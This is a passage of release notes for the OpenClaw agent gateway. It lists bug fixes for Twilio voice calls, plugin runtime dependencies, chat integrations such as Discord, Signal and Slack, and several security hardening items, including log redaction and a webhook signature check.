<p>Voice Call/Twilio: retry transient 21220 live-call TwiML updates and catch answered-path initial-greeting failures, so a fast answered callback no longer crashes the Gateway or drops the Twilio greeting/listen transition. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353522708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74606" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74606/hovercard" href="https://github.com/openclaw/openclaw/pull/74606">#74606</a>) Thanks @Sivan22.</p>
</li>
<li>
<p>CLI/startup: preserve <code>OPENCLAW_HIDE_BANNER</code> banner suppression for route-first startup callers that rely on the default process environment while keeping read-only status/channel paths from repairing bundled plugin runtime dependencies. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360048495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75183/hovercard" href="https://github.com/openclaw/openclaw/pull/75183">#75183</a>.</p>
</li>
<li>
<p>Voice Call/Twilio: register accepted media streams immediately but wait for realtime transcription readiness before speaking the initial greeting, so reconnect grace handling stays live while OpenAI STT startup is no longer starved by TTS. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360162005" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75197" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75197/hovercard" href="https://github.com/openclaw/openclaw/issues/75197">#75197</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361111739" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75257" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75257/hovercard" href="https://github.com/openclaw/openclaw/pull/75257">#75257</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>Voice Call CLI: run gateway-delegated <code>voicecall continue</code> through operation-id polling and protocol-shaped errors, so long conversational turns keep their transcript result without blocking a single Gateway RPC. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363097375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75459" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75459/hovercard" href="https://github.com/openclaw/openclaw/pull/75459">#75459</a>) Thanks @serrurco and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Voice Call CLI: delegate operational <code>voicecall</code> commands to the running Gateway runtime and skip webhook startup during CLI-only plugin loading, preventing webhook port conflicts and <code>setup --json</code> hangs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331824729" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72345" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72345/hovercard" href="https://github.com/openclaw/openclaw/issues/72345">#72345</a>. Thanks @serrurco and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Agents/pi-embedded-runner: extract the <code>abortable</code> provider-call wrapper from <code>runEmbeddedAttempt</code> to module scope so its promise handlers no longer close over the run lexical context, releasing transcripts, tool buffers, and subscription callbacks when a provider call hangs past abort. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348625606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74182" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74182/hovercard" href="https://github.com/openclaw/openclaw/issues/74182">#74182</a>) Thanks @cjboy007.</p>
</li>
<li>
<p>Docker: restore <code>python3</code> in the gateway runtime image after the slim-runtime switch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357583202" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75041" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75041/hovercard" href="https://github.com/openclaw/openclaw/issues/75041">#75041</a>.</p>
</li>
<li>
<p>Agents/session-repair: fix resumed sessions failing with repeated 400 errors on Anthropic and strict OpenAI-compatible providers (Qwen, mlx-vlm) after an interrupted conversation or blank user input. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361379280" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75271" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75271/hovercard" href="https://github.com/openclaw/openclaw/issues/75271">#75271</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362043132" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75313" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75313/hovercard" href="https://github.com/openclaw/openclaw/issues/75313">#75313</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>CLI/Voice Call: scope <code>voicecall</code> command activation to the Voice Call plugin so setup and smoke checks no longer broad-load unrelated plugin runtimes or hang after printing JSON. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Doctor/plugins: warn when restrictive <code>plugins.allow</code> is paired with wildcard or plugin-owned tool allowlists, making the exclusive plugin allowlist behavior visible before users hit empty callable-tool runs. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4174851981" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58009" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58009/hovercard" href="https://github.com/openclaw/openclaw/issues/58009">#58009</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245604493" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64982" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64982/hovercard" href="https://github.com/openclaw/openclaw/issues/64982">#64982</a>. Thanks @KR-Python and @BKF-Gitty.</p>
</li>
<li>
<p>Google Meet/Voice Call: keep Twilio Meet joins in conversation mode and reuse the realtime intro prompt when no voice-call-specific intro is configured, so answered phone bridge calls speak instead of joining silently. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Auto-reply/group chats: keep the <code>message</code> tool available for message-tool-only visible replies and apply group-scoped tool policy before deciding fallback delivery, so Discord/Slack-style rooms reply visibly in the correct channel after upgrades. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355291678" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74842" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74842/hovercard" href="https://github.com/openclaw/openclaw/issues/74842">#74842</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360452638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75207" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75207/hovercard" href="https://github.com/openclaw/openclaw/issues/75207">#75207</a>. Thanks @davelutztx and @aa-on-ai.</p>
</li>
<li>
<p>Agents/commitments: keep inferred follow-ups internal when heartbeat target is none, strip raw source text from stored commitments, disable tools during due-commitment heartbeat turns, bound hidden extraction queue growth, expire stale commitments, and add QA/Docker safety coverage. Thanks @vignesh07.</p>
</li>
<li>
<p>Telegram/agents: keep typing indicators and optional generation tools off the reply critical path, so fresh Telegram replies no longer stall while provider catalogs and media models load. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362421293" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75360" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75360/hovercard" href="https://github.com/openclaw/openclaw/pull/75360">#75360</a>) Thanks @obviyus.</p>
</li>
<li>
<p>Agents/commitments: run hidden follow-up extraction on the configured agent/default model instead of falling back to direct OpenAI, so OpenAI Codex OAuth-only gateways no longer spam background API-key failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362274024" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75334" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75334/hovercard" href="https://github.com/openclaw/openclaw/issues/75334">#75334</a>. Thanks @sene1337.</p>
</li>
<li>
<p>Agents/media: keep async music generation completions on the requester-session wake path even when direct-send completion is enabled, so finished audio stays agent-mediated while video can still opt into direct channel delivery. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362275213" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75335" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75335/hovercard" href="https://github.com/openclaw/openclaw/pull/75335">#75335</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Security/config-audit: redact CLI argv and execArgv secrets before persisting config audit records, covering write, observe, and recovery paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204612186" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60826" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60826/hovercard" href="https://github.com/openclaw/openclaw/issues/60826">#60826</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koshaji/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koshaji">@koshaji</a>.</p>
</li>
<li>
<p>Gateway/models: keep default and configured model-list views responsive when provider catalog discovery stalls, without hiding real catalog load failures, while <code>--all</code> still waits for the exact full catalog. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361752617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75297" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75297/hovercard" href="https://github.com/openclaw/openclaw/issues/75297">#75297</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351397259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74404" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74404/hovercard" href="https://github.com/openclaw/openclaw/issues/74404">#74404</a>. Thanks @lisandromachado and @najef1979-code.</p>
</li>
<li>
<p>Plugins/runtime-deps: accept already materialized package-level runtime-deps supersets as converged, so later lazy plugin activation no longer prunes and relaunches <code>pnpm install</code> after gateway startup pre-staging, reducing event-loop pressure from repeated runtime-deps repair on packaged installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361752617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75297" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75297/hovercard" href="https://github.com/openclaw/openclaw/issues/75297">#75297</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331750102" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72338" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72338/hovercard" href="https://github.com/openclaw/openclaw/issues/72338">#72338</a>. Thanks @brokemac79, @lisandromachado, and @midhunmonachan.</p>
</li>
<li>
<p>Plugins/runtime-deps: remove OpenClaw-owned legacy runtime-deps symlinks before replacing staged bundled plugin dependencies, so updates can recover from older symlinked installs instead of failing the symlink safety guard. Thanks @goldmar.</p>
</li>
<li>
<p>Discord: retry queued REST 429s against learned bucket/global cooldowns and reacquire fresh voice upload URLs after CDN upload rate limits, so outbound sends recover without reusing stale single-use upload URLs. Thanks @discord.</p>
</li>
<li>
<p>TTS/providers: keep bundled speech-provider compat fallback available when plugins are globally disabled, so cold gateway and CLI startup can still resolve fallback speech providers instead of leaving explicit TTS provider selection with no registered providers. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361272168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75265" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75265/hovercard" href="https://github.com/openclaw/openclaw/pull/75265">#75265</a>. Thanks @sliekens.</p>
</li>
<li>
<p>Discord: collapse repeated native slash-command deploy rate-limit startup logs into one non-fatal warning while keeping per-request REST timing in verbose output. Thanks @discord.</p>
</li>
<li>
<p>Discord: report native slash-command deploy aborts as REST timeouts with method, path, timeout budget, and observed duration, so startup logs explain slow Discord API calls instead of showing a generic aborted operation. Thanks @discord.</p>
</li>
<li>
<p>Security/logging: redact payment credential field names such as card number, CVC/CVV, shared payment token, and payment credential across default log and tool-payload redaction patterns so wallet-style MCP tools do not expose raw payment credentials in UI events or transcripts. Thanks @stainlu.</p>
</li>
<li>
<p>Providers/OpenAI Codex: preserve existing wrapped Codex streams during OpenAI attribution so PI OAuth bearer injection reaches ChatGPT/Codex Responses, and strip native Codex-only unsupported payload fields without touching custom compatible endpoints. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358840684" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75111" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75111/hovercard" href="https://github.com/openclaw/openclaw/pull/75111">#75111</a>) Thanks @keshavbotagent.</p>
</li>
<li>
<p>Plugins/runtime-deps: materialize newly required bundled plugin packages after local <code>openclaw onboard</code> and <code>openclaw configure</code> config writes, while keeping remote setup read-only, so first Gateway startup no longer discovers missing channel/provider deps after setup claimed success. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @scottgl9 and @xiaohuaxi.</p>
</li>
<li>
<p>Plugins/runtime-deps: expire stale legacy install locks whose live PID cannot be tied to the current process incarnation, so Docker PID reuse no longer leaves bundled dependency repair stuck behind old <code>.openclaw-runtime-deps.lock</code> directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356320468" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74948" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74948/hovercard" href="https://github.com/openclaw/openclaw/issues/74948">#74948</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356328081" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74950" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74950/hovercard" href="https://github.com/openclaw/openclaw/pull/74950">#74950</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350782800" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74346" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74346/hovercard" href="https://github.com/openclaw/openclaw/issues/74346">#74346</a>. Thanks @dchekmarev.</p>
</li>
<li>
<p>Plugins/runtime-deps: recover interrupted bundled runtime-dependency installs whose package sentinels exist but generated materialization is incomplete, forcing npm/pnpm repair in Gateway startup, doctor, and lazy plugin loads instead of leaving channels crash-looping on missing packages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361991170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75310" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75310/hovercard" href="https://github.com/openclaw/openclaw/pull/75310">#75310</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361740220" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75296" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75296/hovercard" href="https://github.com/openclaw/openclaw/issues/75296">#75296</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361883653" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75304" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75304/hovercard" href="https://github.com/openclaw/openclaw/issues/75304">#75304</a>. Thanks @scottgl9.</p>
</li>
<li>
<p>Plugins/runtime-deps: treat no-main and export-map package sentinels without reachable entry files as incomplete, so Gateway startup, doctor, and lazy plugin loads repair interrupted bundled dependency installs instead of accepting package.json-only partial installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360048495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75183/hovercard" href="https://github.com/openclaw/openclaw/pull/75183">#75183</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: keep runtime inspection and channel maintenance commands from downloading bundled plugin dependencies, route explicit repairs through <code>openclaw plugins deps --repair</code>, and still allow Gateway/DO paths to repair missing deps before import. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @xiaohuaxi.</p>
</li>
<li>
<p>Updates: force non-deferred, no-cooldown update restarts after package-manager updates requested through the live Gateway control plane and fail release validation on post-swap stale chunk import crashes, so Telegram/Discord imports do not stay pointed at removed dist files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360403986" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75206" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75206/hovercard" href="https://github.com/openclaw/openclaw/issues/75206">#75206</a>. Thanks @xonaman and @faux123.</p>
</li>
<li>
<p>Agents/tool-result guard: use the resolved runtime context token budget for non-context-engine tool-result overflow checks, so long tool-heavy sessions no longer compact early when <code>contextTokens</code> is larger than native <code>contextWindow</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355916636" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74917" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74917/hovercard" href="https://github.com/openclaw/openclaw/issues/74917">#74917</a>. Thanks @kAIborg24.</p>
</li>
<li>
<p>Gateway/systemd: exit with sysexits 78 for supervised lock and <code>EADDRINUSE</code> conflicts so <code>RestartPreventExitStatus=78</code> stops <code>Restart=always</code> restart loops instead of repeatedly reloading plugins against an occupied port. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358976301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75115" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75115/hovercard" href="https://github.com/openclaw/openclaw/issues/75115">#75115</a>. Thanks @yhyatt.</p>
</li>
<li>
<p>Agents/runtime: skip blank visible user prompts at the embedded-runner boundary before provider submission while still allowing internal runtime-only turns and media-only prompts, so Telegram/group sessions no longer leak raw empty-input provider errors when replay history exists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348363760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74137" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74137/hovercard" href="https://github.com/openclaw/openclaw/issues/74137">#74137</a>. Thanks @yelog, @Gracker, and @nhaener.</p>
</li>
<li>
<p>Agents/Codex: isolate local Codex app-server <code>CODEX_HOME</code> and <code>HOME</code> per agent and add a deliberate Codex migration path with selectable skill copies, so personal Codex CLI skills, plugins, config, and hooks no longer leak into OpenClaw agents unless the operator migrates them into the workspace. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Security/Nextcloud Talk: make webhook signature validation use the padded timing-safe compare path even when the supplied signature length is wrong, keep normalized header lookup behavior, and extend regression coverage for tampered bodies, wrong secrets, array-backed headers, and truncated signatures. Carries forward earlier contributor work from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4102742606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50516" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50516/hovercard" href="https://github.com/openclaw/openclaw/pull/50516">#50516</a> by teddytennant. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175383760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58097" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58097/hovercard" href="https://github.com/openclaw/openclaw/pull/58097">#58097</a>) Thanks @gavyngong.</p>
</li>
<li>
<p>Plugins/runtime-deps: replace stale symlinked mirror target roots before writing runtime-mirror temp files and skip rewriting already materialized hardlinks, so cross-version container upgrades no longer crash-loop on read-only image-layer paths while warm mirrors do less churn. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358776355" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75108" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75108/hovercard" href="https://github.com/openclaw/openclaw/issues/75108">#75108</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coletebou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coletebou">@coletebou</a> and @xiaohuaxi.</p>
</li>
<li>
<p>Auto-reply/group chats: fall back to automatic source delivery when a channel precomputes message-tool-only replies but the <code>message</code> tool is unavailable, so Discord/Slack-style group turns do not silently complete without a visible reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355462791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74868/hovercard" href="https://github.com/openclaw/openclaw/issues/74868">#74868</a>. Thanks @kagura-agent.</p>
</li>
<li>
<p>Browser/gateway: share one browser control runtime across the HTTP control server and <code>browser.request</code>, and refresh browser profile config from the source snapshot, so CLI status/start honors configured <code>browser.executablePath</code>, <code>headless</code>, and <code>noSandbox</code> instead of falling back to stale auto-detection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358368287" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75087" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75087/hovercard" href="https://github.com/openclaw/openclaw/issues/75087">#75087</a>; repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344146532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73617" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73617/hovercard" href="https://github.com/openclaw/openclaw/issues/73617">#73617</a>. Thanks @civiltox and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</p>
</li>
<li>
<p>Agents/subagents: bound automatic orphan recovery with persisted recovery attempts and a wedged-session tombstone, and teach task maintenance/doctor to reconcile those sessions so restart loops no longer require manual <code>sessions.json</code> surgery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355427349" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74864" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74864/hovercard" href="https://github.com/openclaw/openclaw/issues/74864">#74864</a>. Thanks @solosage1.</p>
</li>
<li>
<p>Plugins/runtime-deps: keep bundled provider policy config loading from staging plugin runtime dependencies, so config reads no longer fail on locked-down <code>/var/lib/openclaw/plugin-runtime-deps</code> directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356579392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74971" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74971/hovercard" href="https://github.com/openclaw/openclaw/issues/74971">#74971</a>. Thanks @eurojojo.</p>
</li>
<li>
<p>Memory/runtime-deps: retain the native <code>node-llama-cpp</code> runtime only when local memory search is configured, so packaged installs can repair local embeddings without relying on unreachable global npm installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355063600" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74777" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74777/hovercard" href="https://github.com/openclaw/openclaw/issues/74777">#74777</a>. Thanks @LLagoon3.</p>
</li>
<li>
<p>Gateway/startup: skip pre-bind web-fetch provider discovery for credential-free <code>tools.web.fetch</code> config, so Docker/Kubernetes gateways bind even when optional fetch limits are present. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355733598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74896" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74896/hovercard" href="https://github.com/openclaw/openclaw/issues/74896">#74896</a>. Thanks @KoykL.</p>
</li>
<li>
<p>Signal: match group allowlists against inbound Signal group ids as well as sender ids, and process explicitly configured Signal groups without requiring mentions unless <code>requireMention</code> is set. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4124822798" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53308" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53308/hovercard" href="https://github.com/openclaw/openclaw/issues/53308">#53308</a>. Thanks @minupla and @juan-flores077.</p>
</li>
<li>
<p>Signal: bound <code>signal-cli</code> installer release and archive downloads with explicit timeouts, declared and streamed size checks, and partial-file cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131804194" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54153" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54153/hovercard" href="https://github.com/openclaw/openclaw/issues/54153">#54153</a>. Thanks @jinduwang1001-max and @juan-flores077.</p>
</li>
<li>
<p>Slack: require bot-authored room messages with <code>allowBots=true</code> to come from an explicitly channel-allowlisted bot or from a room where an explicit Slack owner is present, so broad bot relays cannot run unattended. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190405125" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59284" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59284/hovercard" href="https://github.com/openclaw/openclaw/issues/59284">#59284</a>. Thanks @andrewhong-translucent.</p>
</li>
<li>
